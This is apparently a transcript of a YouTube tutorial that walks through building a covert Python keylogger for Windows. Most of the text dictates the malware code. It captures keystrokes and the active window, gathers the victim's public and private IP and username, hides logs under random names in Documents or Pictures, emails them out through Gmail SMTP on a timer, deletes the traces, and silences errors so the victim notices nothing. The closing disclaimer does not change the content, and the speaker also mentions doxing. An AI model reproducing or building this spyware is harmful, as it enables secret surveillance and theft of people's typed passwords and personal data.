Hello everybody, welcome to the channel. It's W3 here in today's Python tutorial video. So don't forget to hit that subscribe button, tap that notification bell and give the video a like and learn something new. So to begin we need to do our imports. So we're going to do imports and then we're going to do from pyn put dot keyboard import capital K for key and then capital L listener, and that's our import, that's our library that we're going to be using to listen for the keys. Now we need to create the onPress function, which will be called when we press the keys. So we need to start off by def on_press and then key, which is going to be the keys that we're pressing. And then for now, I'm just going to print key to show you later in a minute. And then to run this, we need to do with capital L listener, as in that, and then on_press equals. So on press, we're going to run this function here. It's going to take in the key that we've pressed and it's going to print it out. So we're just going to do on_press as listener, but not with a capital L, and then we're going to join. Right, so now I'm going to run this code. Yep, nothing's happened at the minute. I'm going to press enter, key enter, type in, and as you can see down here, the keys are being printed to console because of our onPress function, which is in that, and that's it. So obviously once we start getting into the keylogger, we're going to have to customize this and do a bit more advanced stuff to actually get it spelling out longer sentences instead of just one letter at a time, etc. So let's get started. First you want to import time, OS, random, requests and socket. For now we're going to do the variables. So we want to get their public IP, so public IP equals request.get https and then API and then ipify.org and then .text, and that's going to go to a blank page, and the only text on it's going to have the public IP address. We also want the private IP, so private IP equals socket.get host by name socket.get host name. Now get the private IP. We want the user account name of the system, so user equals os.path.expand user, and then that character, can't remember what it's called, but that character will bring us to the home directory. And we want to do split, and then that, and then square brackets 2, and that's how we get the user name out of the path, basically directory path. And then we also want to do the date and time, so date time equals time dot ctime and time dot time. So now I'm going to print private IP, I'm going to print user, and here we have it, the username of the account on the system and private IP. I'm not going to print the public IP for obvious reasons. And then we need to do message. Oops. We need message. That's going to be at the top of our logs, start of logs. And I've also incorporated date and time, user profile, public IP, and private IP at the top. So I've got all that information at the top. Then we start logging the keys. And then we want to do logged_data equals square bracket, and then logged_data dot append message, because start of logs is going to be at the top of our log. And then we also want old_app equals that, and then delete_file equals list, and I'll go over these two once we get to them. And that's it for the variables. So now we need to do our onPress function like we did earlier. So def on_press and then key, and then global old_app, and then we can import win32 GUI and that's going to be for new underscore app equals win32 GUI dot get window text, and then get foreground window, and we need to add win32 GUI dot there. Yep, that's correct. Then we need to do if new underscore app is equal to Cortana, new underscore app equals Windows start menu, else just pass. And next we want to substitute some of the keys, so I just copied and pasted this in here because I don't want to spend all day typing it. But some of the keys, or a lot of the keys, as you can see here, key.enter, when you enter the key it will be seen as key.enter, whereas we want it to be bracket enter and then obviously /n, start a new line like you normally would. So we've got normal sentences. Instead of key.backspace we're going to have it as backspace. Instead of key.delete we can have it as bracket delete. There's many here, but yeah, if you want to copy this you can. If you want to leave it as key.enter, key.backspace, like here, key.space, instead of that we've got an actual space and a string, so that's up to you, but I think it's a lot better and it will be. So next we need to strip the keys, so key equals string key dot strip the key, and then we need to substitute the keys if they're in the substitution list. So if key in substitution logged underscore data dot append substitution square bracket substitution dot index, and then the key and +1. So what we're doing here is we're appending substitution, which is this, within square brackets, and then that's going to be an index like you wouldn't normal list, and we're doing substitution dot index, and then we're using the key and then +1. So if we're pressing enter it'll go to enter, and then +1 it'll actually return that enter. Backspace is the same, +1 it'll be backspace, and that's for all these keys. So that's how we're going to do that. And then else logged underscore data dot append key. If it's not in substitution list we can just append the key. And that's it for the onPress function. So just a quick one, this new underscore app equals win32 GUI. What that is doing is it's finding the window that they're using and it's logging that to the log, so we can know that they're using Firefox, or if they change and they've got Sublime text open and they're using that, we'll know what they're using, we'll know what they're on, as well as what keys they're pressing, etc. So let's move on to the write file function, which is what we're going to do to write our logs. So we need to do def write underscore file, and then count, and then we need to do 1 equals os dot path dot expand user, and then same little character there, can't remember what it's called, and then we're going to do plus, and then we can just do folder, say documents, like that. Then we'll also create a second one and change that to 2, so we can have 2 different folders, and it can be going into each folder randomly, so it's not always in one folder. And we'll just change this to pictures. Right, so now we've got them 2 folders. We can do list equals 1 and 2, and then file path equals random dot choice list, and then file name equals string count plus capital I plus random dot randit, and then we can do 1 and then 0 0, that's 3 4 5 6 7, and and then comma, we can do 1, 2, 3, 4, 5, 6, 7, like that. Then we can just do plus dot text. So this way we're getting a count of the logs, start from 0, 1, 2, 3, 4, 5, 6, 7, etc. Then we've got plus I, and then plus a random integer. But only we will know that actually this I, before that, we've actually got the count of what log it is and where it fits into all the other logs. But when this is all together, it will just look like a random long number, and this will look like a 1, or it won't make any difference, it won't look like anything. Now we need to do file equals file path plus file name, and then delete underscore file dot append, and then file name. No, file. And the reason for doing that is because obviously, because we're using random integer, the file name's random, we need to keep track of that file name so that we can obviously delete it when the time comes, then create a new one, etc. So we need to have the file path of where it's in, which folder, and the file name. So delete underscore file is just keeping that for us. Let's move on. And we need to do with open file, and then w, and then as fp, and fp dot write dot join logged underscore data. So to send the files and the logs, we need to create a function called def send underscore logs, and we're also going to need to have a count variable, which is going to equal 0 for now, and that's going to count the logs that are sent to the email, so we know what log is log, what log is what. We've also got a from address and a from password, which is in a config file, and that'll be in config.py, and we're going to import that later. We've got a to address, which equals a from address. Yep, that's fine. And we've got min equals 10, seconds equals 60, and that's because if we do time.sleep and then 10 times 60, that's 10 minutes, what we want, but I'm going to use 10 seconds for this video. And then we've got while true, and then if length of logged underscore data is greater than 1, but yeah, we want to log it, we want to see what's going on. If it's less than 1, it means no keys have been typed. Next we want to go and import some more libraries. So you're going to want to import smtplib, email.my multipart, text, base, and encoders. So next we need to do try, and then we need to do write underscore file, and then count. And then we need to do the subject, so subject equals f, and then user, and then the count of the logs, so we know which user it is from what system and the count of the log. Next we need to do message equals mime multipart, and then we need to do message and then from, it's going to be from our from address, and then copy and paste that. We can do to, and it's going to be to our to address, and then we need to do subject equals our subject up above here. Now if you want me to go over how to email in Python, I will be doing a separate video on that, going through in more detail, in more depth actually, how to send an email, but this is for the keylogin, so it won't be as in depth. Then we need the body of the email, so we just put it as testing for now, and we need message.attach, and then mime text, and then body plain. Like I said, I'll be going in more detail about emailing on a separate video. And then we need our attachment, which is we're going to open the delete underscore file, which is our delete underscore file list, which has the path and the file name of our random integer number, and that's why we have it, so we can open it up, and then we'll read it in bytes, and that's that. And then we need file name. File name is going to equal delete underscore file 0, that's our file name, and then we need the dot split, and then we need to do the slashes because it's a directory path, and then index to number 2, and that's our file name. Then we need to do part equals mime base, and then application, and then an octet stream because we're streaming the bytes. Then we need to set payload, so part.set underscore payload, attachment, and then dot read, because we're reading the attachment. And then we need to encode it in base64, so encoders.encode underscore base64, and then part, and then add the header, so part.add underscore header, content, disposition, and then attachment, file name, and then equals plus string file name. Now file name equals, that can be anything, you can choose equals, and then you can add if you wanted to the file name, but there's no need. And then obviously we need to attach it to our message overall, so message.attach part, like we did here, message.attach, and then mime text body plain. So we're attaching everything to the message. And then we just need to do text equals message.as underscore string. And that's how we create the message and attachment, etc. Now it's just time to do the SMTP, which is setting up basically Gmail server to send the message. So we just got to make a config file, if you remember, because we weren't putting our password straight in the code just for anyone to see plain as day. We created a config file, we got to. So where is it? It's here it is, from address, config.from address. So we've got to make a config file for our from address and from password, and then we'll just import it, and that's it. So from address equals, and then type your from address. So example dot user at gmail.com, and from password equals example password. That's all you got to do, and then just save it as config. I don't need to, I've already got one. And now we just need to import. So import your config file. The config file should be in the same folder or directory as the hacking code, wherever you saved it. And also import threading, because we're going to use a thread in a minute. And yeah, that's that bit done. So to use the SMTP library to send the email, we're going to have to do s equals smtplib.smtp, and then brackets, you need to do smtp.gmail.com, and then we need Gmail's port number, which is 587. So now what we need to do when we're communicating with the servers, we need to give an extended hello, so s.hello, and that's an extended hello. And then we need to think about a little bit of security here. We need to start TLS to make the connection a bit more secure. So s.start TLS, and then again we're going to send another extended hello, so s.hello. And now once we've done that, now we can log into the server, so s.login from address and from password. Now we can send the mail, so s.send mail from address to address and the text, which is what we're sending. We're sending that. So now we will close the attachment, so attachment.close, and we'll close the SMTP server, so s.close as well. So now we need to delete the file off the system once it's been sent out. So we'll do that by doing os.remove delete file and 0. And now we want to delete log data, so delete logged underscore data, square brackets 1, and then colon. So that means it will start at the beginning again. We're going to have our one message first, which will be saying start of log, and then it will have all the details about the person, the user, the public IP, the private IP. Then it will start logging again from the start. So that's why we do delete logged underscore data, and then we've got 1, and then the colons. So next we need to do delete underscore what is it? Delete underscore file 0 and then colon. Same principle, we're just indexing and deleting what we need, etc. And then all we need to do is increase the count by 1, so we know exactly which log is from where basically. And then we just need to put accept, accept and pass. We don't want to print an exception, error or anything because we don't want this program to do anything in front of the eyes of the person basically. So no exception, printing, nothing, not that an exception should happen anyway. So to run the code and test it, etc., we need to do if underscore underscore name underscore underscore is equal to comma underscore underscore main underscore underscore. So basically all our code that we write under if underscore name is equal to main, that's only going to run when the specific file has actually been run or commanded to run. So basically if we were to import this hacking tool into another script, none of the code will suddenly start running and start keylogging us, etc., because it's only going to do that if it's actually specifically run from the file itself. So not that it really makes a difference because we're not going to be importing it, but that's just what that means, and I'll be doing another video on that, explaining that in detail and in depth. And I have a really good saying that I can't remember right now, but I do have a good saying, and if you don't get it, it'll click with you instantly, so don't worry. So we're going to do t1 equals threading dot thread, and then target equals send underscore logs, and then t1 dot start, and then we just need to do listener, what is it, with listener on underscore press like we did it at the beginning of the video, and then on underscore press as listener dot join. And there we have it, everybody. We've just created a very own pretty advanced keylogger that keylogs, sends you every 10 minutes, deletes the log, changes the file name, changes where the file is actually kept, and yeah, has a little bit of detail about them: public IP, private IP, their username, the day and the time, what they're doing, what app they're on, if they're on Firefox, if they're, what they're doing. Do you know what I mean? You can build quite a lot of info about them. And that moves into another subject called doxing, but it's not for this video. But yeah. So right, before we actually run the keylogger, etc., you've got to go into your Gmail account, if you have a Gmail account and you're using that, and you've got to let less secure apps access your account. That's because Python, they say, is a less secure app basically, and you've got to go in there and you've just got to configure a couple of settings, and then you'll be able to send emails through Python. So you go to your Google account, on the left navigation panel, click security, and on the bottom page in the less secure app access panel, turn on access. It's as simple as that. Once you've done that, we can go to this. So now we've finished, gonna do less secure app access, allow less secure apps on. Just tried it a minute ago, wasn't working, didn't have less secure apps on, so just showing you, turn it on. Then we go to Python, going to run it. Now it's running, but nothing's happening until you press a key. So pressing the key, okay, now it's beginning. I did set the time to time.sleep 10, but I've actually changed that to 30, so 30 seconds, so I can actually show you. It's going to go into one of these folders here, and let's see it appear, let's see the random number name, and then let's see it disappear once it's been sent to my email, and then afterwards we'll check my emails as well. So just gotta wait. Speeding this up, I will after. And as you can see, here we are. It's appearing, then it's getting sent to my email, and it gets removed. Then a new log is created, logs the keys, but obviously I've got to type. This log. As you can see, the log is changing. It's disappearing. It's reappearing. It's getting sent to my email. It's doing exactly what we wanted. So then afterwards, the way you exit the keylogger, as you may be thinking, is running in the background. You're going to have to go to Task Manager, you have to go to Processes, and then you're going to have to exit or end the task. Basically, you've got to exit the process or end the task. If you're on Windows, go to your Task Manager and do that. If you're on Linux, I'm not too sure off the top of my head, but yeah, that's how you stop it. And that's the end of the video, guys. Hope you've enjoyed it. Hope you learned something. Don't use this for naughty purposes either. I'm not condoning that. This is just for like information, learning, etc. It's good to learn. And if you haven't already, hit that subscribe button, leave a like, leave a comment, hit that notification bell so you always keep updated with the latest videos. And if there's any other videos you'd like to see, let me know. Bye.